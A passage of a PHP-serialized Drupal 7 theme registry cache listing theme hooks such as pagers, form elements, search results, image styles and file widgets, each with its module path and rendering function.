functions\";a:1:{i:0;s:25:\"template_process_username\";}}s:12:\"progress_bar\";a:4:{s:9:\"variables\";a:2:{s:7:\"percent\";N;s:7:\"message\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:18:\"theme_progress_bar\";}s:11:\"indentation\";a:4:{s:9:\"variables\";a:1:{s:4:\"size\";i:1;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:17:\"theme_indentation\";}s:8:\"html_tag\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:14:\"theme_html_tag\";}s:11:\"update_page\";a:4:{s:9:\"variables\";a:2:{s:7:\"content\";N;s:13:\"show_messages\";b:1;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:17:\"theme_update_page\";}s:12:\"install_page\";a:4:{s:9:\"variables\";a:1:{s:7:\"content\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:18:\"theme_install_page\";}s:9:\"task_list\";a:4:{s:9:\"variables\";a:2:{s:5:\"items\";N;s:6:\"active\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:15:\"theme_task_list\";}s:17:\"authorize_message\";a:4:{s:9:\"variables\";a:2:{s:7:\"message\";N;s:7:\"success\";b:1;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:23:\"theme_authorize_message\";}s:16:\"authorize_report\";a:4:{s:9:\"variables\";a:1:{s:8:\"messages\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:22:\"theme_authorize_report\";}s:5:\"pager\";a:4:{s:9:\"variables\";a:4:{s:4:\"tags\";a:0:{}s:7:\"element\";i:0;s:10:\"parameters\";a:0:{}s:8:\"quantity\";i:9;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:11:\"theme_pager\";}s:11:\"pager_first\";a:4:{s:9:\"variables\";a:3:{s:4:\"text\";N;s:7:\"element\";i:0;s:10:\"parameters\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:17:\"theme_pager_first\";}s:14:\"pager_previous\";a:4:{s:9:\"variables\";a:4:{s:4:\"text\";N;s:7:\"element\";i:0;s:8:\"interval\";i:1;s:10:\"parameters\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:20:\"theme_pager_previous\";}s:10:\"pager_next\";a:4:{s:9:\"variables\";a:4:{s:4:\"text\";N;s:7:\"element\";i:0;s:8:\"interval\";i:1;s:10:\"parameters\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:16:\"theme_pager_next\";}s:10:\"pager_last\";a:4:{s:9:\"variables\";a:3:{s:4:\"text\";N;s:7:\"element\";i:0;s:10:\"parameters\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:16:\"theme_pager_last\";}s:10:\"pager_link\";a:4:{s:9:\"variables\";a:5:{s:4:\"text\";N;s:8:\"page_new\";N;s:7:\"element\";N;s:10:\"parameters\";a:0:{}s:10:\"attributes\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:16:\"theme_pager_link\";}s:9:\"menu_link\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:15:\"theme_menu_link\";}s:15:\"menu_local_task\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:21:\"theme_menu_local_task\";}s:17:\"menu_local_action\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:23:\"theme_menu_local_action\";}s:16:\"menu_local_tasks\";a:4:{s:9:\"variables\";a:2:{s:7:\"primary\";a:0:{}s:9:\"secondary\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:22:\"theme_menu_local_tasks\";}s:6:\"select\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:12:\"theme_select\";}s:8:\"fieldset\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:14:\"theme_fieldset\";}s:5:\"radio\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:11:\"theme_radio\";}s:6:\"radios\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:12:\"theme_radios\";}s:4:\"date\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:10:\"theme_date\";}s:15:\"exposed_filters\";a:4:{s:14:\"render element\";s:4:\"form\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:21:\"theme_exposed_filters\";}s:8:\"checkbox\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:14:\"theme_checkbox\";}s:10:\"checkboxes\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:16:\"theme_checkboxes\";}s:6:\"button\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:12:\"theme_button\";}s:12:\"image_button\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:18:\"theme_image_button\";}s:6:\"hidden\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:12:\"theme_hidden\";}s:9:\"textfield\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:15:\"theme_textfield\";}s:4:\"form\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:10:\"theme_form\";}s:8:\"textarea\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:14:\"theme_textarea\";}s:8:\"password\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:14:\"theme_password\";}s:4:\"file\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:10:\"theme_file\";}s:11:\"tableselect\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:17:\"theme_tableselect\";}s:12:\"form_element\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:18:\"theme_form_element\";}s:20:\"form_required_marker\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:26:\"theme_form_required_marker\";}s:18:\"form_element_label\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:24:\"theme_form_element_label\";}s:13:\"vertical_tabs\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:19:\"theme_vertical_tabs\";}s:9:\"container\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:15:\"theme_container\";}s:18:\"system_themes_page\";a:6:{s:9:\"variables\";a:1:{s:12:\"theme_groups\";N;}s:4:\"file\";s:16:\"system.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:24:\"theme_system_themes_page\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/system/system.admin.inc\";}}s:20:\"system_settings_form\";a:4:{s:14:\"render element\";s:4:\"form\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:26:\"theme_system_settings_form\";}s:12:\"confirm_form\";a:4:{s:14:\"render element\";s:4:\"form\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:18:\"theme_confirm_form\";}s:23:\"system_modules_fieldset\";a:6:{s:14:\"render element\";s:4:\"form\";s:4:\"file\";s:16:\"system.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:29:\"theme_system_modules_fieldset\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/system/system.admin.inc\";}}s:27:\"system_modules_incompatible\";a:6:{s:9:\"variables\";a:1:{s:7:\"message\";N;}s:4:\"file\";s:16:\"system.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:33:\"theme_system_modules_incompatible\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/system/system.admin.inc\";}}s:24:\"system_modules_uninstall\";a:6:{s:14:\"render element\";s:4:\"form\";s:4:\"file\";s:16:\"system.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:30:\"theme_system_modules_uninstall\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/system/system.admin.inc\";}}s:13:\"status_report\";a:6:{s:14:\"render element\";s:12:\"requirements\";s:4:\"file\";s:16:\"system.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:19:\"theme_status_report\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/system/system.admin.inc\";}}s:10:\"admin_page\";a:6:{s:9:\"variables\";a:1:{s:6:\"blocks\";N;}s:4:\"file\";s:16:\"system.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:16:\"theme_admin_page\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/system/system.admin.inc\";}}s:11:\"admin_block\";a:6:{s:9:\"variables\";a:1:{s:5:\"block\";N;}s:4:\"file\";s:16:\"system.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:17:\"theme_admin_block\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/system/system.admin.inc\";}}s:19:\"admin_block_content\";a:6:{s:9:\"variables\";a:1:{s:7:\"content\";N;}s:4:\"file\";s:16:\"system.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:25:\"theme_admin_block_content\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/system/system.admin.inc\";}}s:18:\"system_admin_index\";a:6:{s:9:\"variables\";a:1:{s:10:\"menu_items\";N;}s:4:\"file\";s:16:\"system.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:24:\"theme_system_admin_index\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/system/system.admin.inc\";}}s:17:\"system_powered_by\";a:4:{s:9:\"variables\";a:0:{}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:23:\"theme_system_powered_by\";}s:19:\"system_compact_link\";a:4:{s:9:\"variables\";a:0:{}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:25:\"theme_system_compact_link\";}s:25:\"system_date_time_settings\";a:6:{s:14:\"render element\";s:4:\"form\";s:4:\"file\";s:16:\"system.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:31:\"theme_system_date_time_settings\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/system/system.admin.inc\";}}s:22:\"shortcut_set_customize\";a:6:{s:14:\"render element\";s:4:\"form\";s:4:\"file\";s:18:\"shortcut.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:16:\"modules/shortcut\";s:8:\"function\";s:28:\"theme_shortcut_set_customize\";s:8:\"includes\";a:1:{i:0;s:35:\"modules/shortcut/shortcut.admin.inc\";}}s:17:\"search_block_form\";a:6:{s:14:\"render element\";s:4:\"form\";s:8:\"template\";s:32:\"modules/search/search-block-form\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/search\";s:20:\"preprocess functions\";a:3:{i:0;s:19:\"template_preprocess\";i:1;s:37:\"template_preprocess_search_block_form\";i:2;s:21:\"contextual_preprocess\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:13:\"search_result\";a:8:{s:9:\"variables\";a:2:{s:6:\"result\";N;s:6:\"module\";N;}s:4:\"file\";s:16:\"search.pages.inc\";s:8:\"template\";s:28:\"modules/search/search-result\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/search\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/search/search.pages.inc\";}s:20:\"preprocess functions\";a:3:{i:0;s:19:\"template_preprocess\";i:1;s:33:\"template_preprocess_search_result\";i:2;s:21:\"contextual_preprocess\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:14:\"search_results\";a:8:{s:9:\"variables\";a:2:{s:7:\"results\";N;s:6:\"module\";N;}s:4:\"file\";s:16:\"search.pages.inc\";s:8:\"template\";s:29:\"modules/search/search-results\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/search\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/search/search.pages.inc\";}s:20:\"preprocess functions\";a:3:{i:0;s:19:\"template_preprocess\";i:1;s:34:\"template_preprocess_search_results\";i:2;s:21:\"contextual_preprocess\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:29:\"rdf_template_variable_wrapper\";a:4:{s:9:\"variables\";a:4:{s:7:\"content\";N;s:10:\"attributes\";a:0:{}s:7:\"context\";a:0:{}s:6:\"inline\";b:1;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:11:\"modules/rdf\";s:8:\"function\";s:35:\"theme_rdf_template_variable_wrapper\";}s:12:\"rdf_metadata\";a:4:{s:9:\"variables\";a:1:{s:8:\"metadata\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:11:\"modules/rdf\";s:8:\"function\";s:18:\"theme_rdf_metadata\";}s:7:\"overlay\";a:6:{s:14:\"render element\";s:4:\"page\";s:8:\"template\";s:23:\"modules/overlay/overlay\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:15:\"modules/overlay\";s:20:\"preprocess functions\";a:3:{i:0;s:19:\"template_preprocess\";i:1;s:27:\"template_preprocess_overlay\";i:2;s:21:\"contextual_preprocess\";}s:17:\"process functions\";a:3:{i:0;s:16:\"template_process\";i:1;s:24:\"template_process_overlay\";i:2;s:11:\"rdf_process\";}}s:23:\"overlay_disable_message\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:15:\"modules/overlay\";s:8:\"function\";s:29:\"theme_overlay_disable_message\";}s:12:\"options_none\";a:4:{s:9:\"variables\";a:2:{s:8:\"instance\";N;s:6:\"option\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:29:\"modules/field/modules/options\";s:8:\"function\";s:18:\"theme_options_none\";}s:17:\"node_search_admin\";a:4:{s:14:\"render element\";s:4:\"form\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/node\";s:8:\"function\";s:23:\"theme_node_search_admin\";}s:13:\"node_add_list\";a:6:{s:9:\"variables\";a:1:{s:7:\"content\";N;}s:4:\"file\";s:14:\"node.pages.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/node\";s:8:\"function\";s:19:\"theme_node_add_list\";s:8:\"includes\";a:1:{i:0;s:27:\"modules/node/node.pages.inc\";}}s:12:\"node_preview\";a:6:{s:9:\"variables\";a:1:{s:4:\"node\";N;}s:4:\"file\";s:14:\"node.pages.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/node\";s:8:\"function\";s:18:\"theme_node_preview\";s:8:\"includes\";a:1:{i:0;s:27:\"modules/node/node.pages.inc\";}}s:19:\"node_admin_overview\";a:6:{s:9:\"variables\";a:2:{s:4:\"name\";N;s:4:\"type\";N;}s:4:\"file\";s:17:\"content_types.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/node\";s:8:\"function\";s:25:\"theme_node_admin_overview\";s:8:\"includes\";a:1:{i:0;s:30:\"modules/node/content_types.inc\";}}s:17:\"node_recent_block\";a:4:{s:9:\"variables\";a:1:{s:5:\"nodes\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/node\";s:8:\"function\";s:23:\"theme_node_recent_block\";}s:19:\"node_recent_content\";a:4:{s:9:\"variables\";a:1:{s:4:\"node\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/node\";s:8:\"function\";s:25:\"theme_node_recent_content\";}s:18:\"menu_overview_form\";a:6:{s:4:\"file\";s:14:\"menu.admin.inc\";s:14:\"render element\";s:4:\"form\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/menu\";s:8:\"function\";s:24:\"theme_menu_overview_form\";s:8:\"includes\";a:1:{i:0;s:27:\"modules/menu/menu.admin.inc\";}}s:19:\"menu_admin_overview\";a:6:{s:4:\"file\";s:14:\"menu.admin.inc\";s:9:\"variables\";a:3:{s:5:\"title\";N;s:4:\"name\";N;s:11:\"description\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/menu\";s:8:\"function\";s:25:\"theme_menu_admin_overview\";s:8:\"includes\";a:1:{i:0;s:27:\"modules/menu/menu.admin.inc\";}}s:11:\"image_style\";a:4:{s:9:\"variables\";a:7:{s:10:\"style_name\";N;s:4:\"path\";N;s:5:\"width\";N;s:6:\"height\";N;s:3:\"alt\";s:0:\"\";s:5:\"title\";N;s:10:\"attributes\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/image\";s:8:\"function\";s:17:\"theme_image_style\";}s:16:\"image_style_list\";a:4:{s:9:\"variables\";a:1:{s:6:\"styles\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/image\";s:8:\"function\";s:22:\"theme_image_style_list\";}s:19:\"image_style_effects\";a:4:{s:14:\"render element\";s:4:\"form\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/image\";s:8:\"function\";s:25:\"theme_image_style_effects\";}s:19:\"image_style_preview\";a:4:{s:9:\"variables\";a:1:{s:5:\"style\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/image\";s:8:\"function\";s:25:\"theme_image_style_preview\";}s:12:\"image_anchor\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/image\";s:8:\"function\";s:18:\"theme_image_anchor\";}s:20:\"image_resize_summary\";a:4:{s:9:\"variables\";a:1:{s:4:\"data\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/image\";s:8:\"function\";s:26:\"theme_image_resize_summary\";}s:19:\"image_scale_summary\";a:4:{s:9:\"variables\";a:1:{s:4:\"data\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/image\";s:8:\"function\";s:25:\"theme_image_scale_summary\";}s:18:\"image_crop_summary\";a:4:{s:9:\"variables\";a:1:{s:4:\"data\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/image\";s:8:\"function\";s:24:\"theme_image_crop_summary\";}s:20:\"image_rotate_summary\";a:4:{s:9:\"variables\";a:1:{s:4:\"data\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/image\";s:8:\"function\";s:26:\"theme_image_rotate_summary\";}s:12:\"image_widget\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/image\";s:8:\"function\";s:18:\"theme_image_widget\";}s:15:\"image_formatter\";a:4:{s:9:\"variables\";a:3:{s:4:\"item\";N;s:4:\"path\";N;s:11:\"image_style\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/image\";s:8:\"function\";s:21:\"theme_image_formatter\";}s:21:\"filter_admin_overview\";a:6:{s:14:\"render element\";s:4:\"form\";s:4:\"file\";s:16:\"filter.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/filter\";s:8:\"function\";s:27:\"theme_filter_admin_overview\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/filter/filter.admin.inc\";}}s:32:\"filter_admin_format_filter_order\";a:6:{s:14:\"render element\";s:7:\"element\";s:4:\"file\";s:16:\"filter.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/filter\";s:8:\"function\";s:38:\"theme_filter_admin_format_filter_order\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/filter/filter.admin.inc\";}}s:11:\"filter_tips\";a:6:{s:9:\"variables\";a:2:{s:4:\"tips\";N;s:4:\"long\";b:0;}s:4:\"file\";s:16:\"filter.pages.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/filter\";s:8:\"function\";s:17:\"theme_filter_tips\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/filter/filter.pages.inc\";}}s:19:\"text_format_wrapper\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/filter\";s:8:\"function\";s:25:\"theme_text_format_wrapper\";}s:21:\"filter_tips_more_info\";a:4:{s:9:\"variables\";a:0:{}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/filter\";s:8:\"function\";s:27:\"theme_filter_tips_more_info\";}s:17:\"filter_guidelines\";a:4:{s:9:\"variables\";a:1:{s:6:\"format\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/filter\";s:8:\"function\";s:23:\"theme_filter_guidelines\";}s:9:\"file_link\";a:4:{s:9:\"variables\";a:2:{s:4:\"file\";N;s:14:\"icon_directory\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/file\";s:8:\"function\";s:15:\"theme_file_link\";}s:9:\"file_icon\";a:4:{s:9:\"variables\";a:3:{s:4:\"file\";N;s:14:\"icon_directory\";N;s:3:\"alt\";s:0:\"\";}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/file\";s:8:\"function\";s:15:\"theme_file_icon\";}s:17:\"file_managed_file\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/file\";s:8:\"function\";s:23:\"theme_file_managed_file\";}s:11:\"file_widget\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/file\";s:8:\"function\";s:17:\"theme_file_widget\";}s:20:\"file_widget_multiple\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/file\";s:8:\"function\";s:26:\"theme_file_widget_multiple\";}s:20:\"file_formatter_table\";a:4:{s:9:\"variables\";a:1:{s:5:\"items\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/file\";s:8:\"function\";s:26:\"theme_file_formatter_table\";}s:16:\"file_upload_help\";a:4:{s:9:\"variables\";a:2:{s:11:\"description\";N;s:17:\"upload_validators\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/file\";s:8:\"function\";s:22:\"theme_file_upload_help\";}s:14:\"field_ui_table\";a:4:{s:14:\"render element\";s:8:\"elements\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:16:\"modules/field_ui\";s:8:\"function\";s:20:\"theme_field_ui_table\";}s:5:\"field\";a:6:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/field\";s:8:\"function\";s:11:\"theme_field\";s:20:\"preprocess functions\";a:2:{i:0;s:25:\"template_preprocess_field\";i:1;s:20:\"rdf_preprocess_field\";}s:17:\"process functions\";a:1:{i:0;s:22:\"template_process_field\";}}s:25:\"field_multiple_value_form\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/field\";s:8:\"function\";s:31:\"theme_field_multiple_value_form\";}s:13:\"dblog_message\";a:6:{s:9:\"variables\";a:2:{s:5:\"event\";N;s:4:\"link\";b:0;}s:4:\"file\";s:15:\"dblog.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/dblog\";s:8:\"function\";s:19:\"theme_dblog_message\";s:8:\"includes\";a:1:{i:0;s:29:\"modules/dblog/dblog.admin.inc\";}}s:9:\"dashboard\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:17:\"modules/dashboard\";s:8:\"function\";s:15:\"theme_dashboard\";}s:15:\"dashboard_admin\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:17:\"modules/dashboard\";s:8:\"function\";s:21:\"theme_dashboard_admin\";}s:16:\"dashboard_region\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:17:\"modules/dashboard\";s:8:\"function\";s:22:\"theme_dashboard_region\";}s:25:\"dashboard_disabled_blocks\";a:4:{s:9:\"variables\";a:1:{s:6:\"blocks\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:17:\"modules/dashboard\";s:8:\"function\";s:31:\"theme_dashboard_disabled_blocks\";}s:24:\"dashboard_disabled_block\";a:4:{s:9:\"variables\";a:1:{s:5:\"block\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:17:\"modules/dashboard\";s:8:\"function\";s:30:\"theme_dashboard_disabled_block\";}s:28:\"dashboard_admin_display_form\";a:9:{s:8:\"template\";s:24:\"block-admin-display-form\";s:4:\"path\";s:13:\"modules/block\";s:4:\"file\";s:15:\"block.admin.inc\";s:14:\"render element\";s:4:\"form\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:17:\"modules/dashboard\";s:8:\"includes\";a:1:{i:0;s:29:\"modules/block/block.admin.inc\";}s:20:\"preprocess functions\";a:3:{i:0;s:19:\"template_preprocess\";i:1;s:48:\"template_preprocess_dashboard_admin_display_form\";i:2;s:21:\"contextual_preprocess\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:13:\"comment_block\";a:4:{s:9:\"variables\";a:0:{}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:15:\"modules/comment\";s:8:\"function\";s:19:\"theme_comment_block\";}s:15:\"comment_preview\";a:4:{s:9:\"variables\";a:1:{s:7:\"comment\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:15:\"modules/comment\";s:8:\"function\";s:21:\"theme_comment_preview\";}s:22:\"comment_post_forbidden\";a:4:{s:9:\"variables\";a:1:{s:4:\"node\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:15:\"modules/comment\";s:8:\"function\";s:28:\"theme_comment_post_forbidden\";}s:17:\"color_scheme_form\";a:4:{s:14:\"render element\";s:4:\"form\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/color\";s:8:\"function\";s:23:\"theme_color_scheme_form\";}s:10:\"adsense_ad\";a:4:{s:9:\"variables\";a:3:{s:2:\"ad\";N;s:6:\"module\";N;s:6:\"format\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme 